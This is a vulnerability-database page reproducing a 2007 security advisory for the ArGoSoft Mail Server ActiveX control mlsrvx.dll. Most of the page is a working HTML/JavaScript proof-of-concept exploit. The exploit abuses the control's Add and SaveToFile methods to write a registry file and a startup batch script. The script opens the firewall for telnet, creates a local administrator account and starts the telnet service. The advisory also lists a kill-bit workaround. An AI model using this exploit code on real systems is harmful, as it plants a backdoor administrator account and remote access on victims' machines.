Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution

🗓️ 27 Jul 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 15 Views

mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution vulnerability in Windows X

Code

                                                <!--
----------------------------------------------------------------------------

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Arbitrary Data Write & Remote Code Execution
============================================================================ ========

Internal ID: VULWAR2007271.
-----------

Introduction
------------
mlsrvx.dll is a library included in the Program ArGoSoft Mail Server
software package from ArgoSoft Company.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The Add & SaveToFile methods doesn't check if they're being called from the application,
or malicious users. Remote Attacker could craft a html page and write arbitrary
files.


Impact
------
An attacker could write arbitrary data and execute arbitrary code into the
remote machine.


Workaround
----------
- Activate the Kill bit zero in clsid:3F06B376-8DB8-49D1-8BF8-D4C070EFEBA5
- Unregister mlsrvx.dll using regsvr32.


Timeline
--------
July 27 2007 -- Bug Discovery.
July 27 2007 -- Exploit published.


Credits
-------
 * callAX <[email protected]>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>
 

Technical Details
-----------------
Telnet service will be started in (2) reboot. Any other kind of exploit could be easily
set up because the attacker can write files and put specific data into these files.
Attacker could also encrypt easily the HTML file using Javascript Techniques, so the code could
be harder to understand. You may need some changes to standard english win32 paths in the provided
Javascript Proof of Concept.


Proof of Concept
---------------->

<HTML>
<BODY>
  <object id=ctrl classid="clsid:{3F06B376-8DB8-49D1-8BF8-D4C070EFEBA5}"></object>
  <object id=ctrl0 classid="clsid:{3F06B376-8DB8-49D1-8BF8-D4C070EFEBA5}"></object>
<SCRIPT>

function DoDirtyJob()
    { 
//----------------------------------------START CREATING REG FILE----------------------------//
    // Setup Path to reg file. This file will be used to set Up Telnet Service to Manual Mode
    // so the next (2) reboots the service will be started.
    RegFile="c:\\windows\\system32\\config.reg"
    // Lines to be written into reg file.
    Line50="REGEDIT4"
    Line51="[HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\TlntSvr]"
    Line52='"Start"=dword:0000003'
 
    Line53="[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr]"
    Line54='"Start"=dword:0000003'

    ctrl.Add (Line50);
    ctrl.SaveToFile (RegFile);
    ctrl.Add (Line51);
    ctrl.SaveToFile (RegFile);
    ctrl.Add (Line52);
    ctrl.SaveToFile (RegFile);
    ctrl.Add (Line53);
    ctrl.SaveToFile (RegFile);
    ctrl.Add (Line54);
    ctrl.SaveToFile (RegFile);
//---------------------------------------REG FILE IS FINISHED-------------------------------//

//--------------------------------------START CREATING BAT FILE------------------------------//

    // Path and file
    File="c:\\docume~1\\callax\\menudm~1\\progra~1\\dmarra~1\\msservice.bat"

    // Set Up Lines to write into bat file. Basically allowing telnet server, creating one user, adding this user to admins group,
    // and changing values into regedit without user confirmation. Telnet will be started automatically the next (2) reboots.

    Line1="@echo off"
    // Enabling telnet service in the windows firewall.
    Line2="netsh firewall add allowedprogram %SystemRoot%\\system32\\tlntsvr.exe MicrosoftXMLService ENABLE"

    // If needed this line open one port from Windows Firewall
    //OpeningPortLine="netsh firewall add portopening tcp 63555 MicrosoftUpdateService"
    

    Line3="net user guest1 guest1 /add"
    Line4="net localgroup Administrateurs guest1 /add"
    // Changing the regedit WITHOUT user confirmation.
    Line5="regedit /s c:\\windows\\system32\\config.reg"
    Line6="net start telnet"

    // Writing lines into file Using vulnerable method Add.
    ctrl0.Add (Line1);
    // Saving lines into the file using vulnerable method SaveToFile.
    ctrl0.SaveToFile (File);
    ctrl0.Add (Line2);
    ctrl0.SaveToFile (File);
    ctrl0.Add (Line3);
    ctrl0.SaveToFile (File);
    ctrl0.Add (Line4);
    ctrl0.SaveToFile (File);
    ctrl0.Add (Line5);
    ctrl0.SaveToFile (File);
    ctrl0.Add (Line6);
    ctrl0.SaveToFile (File);
}
//---------------------------------------BAT FILE IS FINISHED-------------------------------//
</SCRIPT>
<input language=JavaScript onclick=DoDirtyJob() type=button value="Proof Of
Concept">
</BODY>
</HTML>

# sebug.net

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
27 Jul 2007 00:00Current
7.1High risk
Vulners AI Score7.1
argosoft mail serverdata writecode executionwindows xpinternet explorerremote attackkill bitregsvr32bug discoveryexploit publishedtelnet service
15